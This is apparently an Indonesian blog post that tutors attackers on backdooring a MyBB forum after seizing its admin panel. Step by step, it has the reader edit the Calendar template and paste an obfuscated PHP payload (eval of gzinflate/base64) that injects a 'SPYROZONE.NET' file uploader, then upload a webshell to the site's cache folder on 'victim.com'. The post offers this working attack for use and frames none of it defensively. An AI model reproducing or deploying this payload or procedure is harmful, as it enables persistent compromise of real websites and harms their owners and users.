MyBB adalah aplikasi web berbasis PHP untuk forum/bulletin board. Sesuai dengan MyBB wiki, MyBB tidak mengizinkan sembarang code PHP pada templatenya:
“.. PHP is not parsed in templates. The only PHP values accepted are scalar and hash values such as {$myvalue} or {$myvalue['myhash']} ..”
Lalu, bagaimana cara menanam backdoor (upload webshell, file uploader, etc..) jika kita sudah menguasai Admin panelnya? Untungnya dokumentasi tersebut juga menyertakan clue yang bisa dimanfaatkan attacker untuk menanam backdoor. Ikuti panduan berikut
- Login ke MyBB control panel dengan username dan password Administrator yang sudah Anda dapakan. Klik menu [Templates and Style]. Anda akan dibawa ke halaman Themes. Perhatikan kotak hijau di sebelah kanan nama theme. Kotak hijau tersebut menandakan bahwa theme tersebut sedang aktif.Klik menu [Templates] pada area navigasi kiri.
- Anda kini berada di halaman Template Sets. Karena pada halaman Themes tadi Theme yang aktif adalah Default, maka kini klik [Expand Templates] pada template yang memiliki keterangan “used by Default“.
- Kini ada beberapa template yang bisa Anda pilih untuk disisipi backdoor. Klik menu [Expand] milik Calendar Templates.
- Pada halaman rincian Calendar Templates, klik [Options] milik Calendar, kemudian pilih [Full Edit].
- Anda akan disuguhi halaman dengan code editor. Seperti yang sudah saya singgung di paragraf pertama artikel ini, MyBB tidak mengizikan sembarang code PHP. Jika Anda menulis code php pada halaman tersebut, code Anda akan ditampilkan apa adanya a.k.a tidak dijalankan. Untuk itu, silahkan menggunakan SPYROZONE.NET MyBB File Uploader. Salin code berikut, paste sebelum tag <html>
{${eval(gzinflate(base64_decode('fZJPa9wwEMXvhXyH6VBwFhpr/1xCYntzaWgg0IVtTssSZHlsi9iSkMYpTsh3j3Yd0kBpThrxfvPeMNK6yNabnxsg1VpIsko/gux0Y3JUZJg8FpnuGyitr8jnOEcIXuXYMrsLIQJL1mqRBjd6+2QNpYZYtFI9aNNE1XrZkFjOFwsxX4p+LMt6SJ1pEP7oitscV6slQku6aTnHxeo8xpW+yGrre+iJW1vl6GxgBDKKR0c59kPH2knP4kCdVZLlYUjjBoaJqHVHCEb273XQT7Fenr+Dk3gce3CdlRW+9Yah7HWMe5TdEK93k1hkx7B4xAUVyeXJF12ffrvf/Nr+3iUfXJL97DkqV8q6MerXN7c/trvkMEOy3yXcu/tDcLL/Dqikaklg+g81EbPZ8/FJMCuL/0IpwpRLFYRBKQqhHrpu/JqJ8rhIvHyhLtBfq2sZDSpg+9YIn3h/MHmBdfwnrw==')))}}
Klik [Save and Continue Editing] untuk menyimpan perubahan yang sudah Anda lakukan. - Kini bukalah halaman utama forum, lalu pergilah ke halaman Calendar (victim.com/mybbfolder/calendar.php). SPYROZONE.NET MyBB File Uploader akan tampil diatas header forum ^^ Silahkan upload Webshell Anda mengunakan file uploader tersebut Jika upload berhasil dilakukan, file Anda akan tersimpan pada folder cache (victim.com/mybbfolder/cache/your-file.php).
Tidak ada komentar:
Posting Komentar